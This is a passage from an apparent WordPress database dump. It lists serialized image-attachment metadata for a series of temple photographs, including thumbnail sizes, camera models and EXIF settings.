ECK_Temple_CO_053-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-550x365.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-452x300.jpg\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"NEX-5R\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442664616\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25855,165271,'_wp_attached_file','2019/09/ECK_Temple_CO_054-lg.jpg'),(25856,165271,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_054-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_054-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_054-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442654426\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25857,165272,'_wp_attached_file','2019/09/ECK_Temple_CO_055-lg.jpg'),(25858,165272,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_055-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_055-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_055-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442656152\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25859,165273,'_wp_attached_file','2019/09/ECK_Temple_CO_056-lg.jpg'),(25860,165273,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_056-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_056-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_056-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442656227\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25861,165274,'_wp_attached_file','2019/09/ECK_Temple_CO_057-lg.jpg'),(25862,165274,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_057-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_057-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_057-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442656547\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"8.98\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25863,165275,'_wp_attached_file','2019/09/ECK_Temple_CO_058-lg.jpg'),(25864,165275,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_058-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_058-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_058-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442655812\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"6.35\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25865,165276,'_wp_attached_file','2019/09/ECK_Temple_CO_059-lg.jpg'),(25866,165276,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_059-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_059-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_059-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442698577\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.041666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25867,165277,'_wp_attached_file','2019/09/ECK_Temple_CO_060-lg.jpg'),(25868,165277,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_060-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_060-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_060-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442654881\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.85\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25869,165278,'_wp_attached_file','2019/09/ECK_Temple_CO_061-lg.jpg'),(25870,165278,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_061-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_061-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_061-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442657071\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25871,165279,'_wp_attached_file','2019/09/ECK_Temple_CO_062-lg.jpg'),(25872,165279,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_062-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_062-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i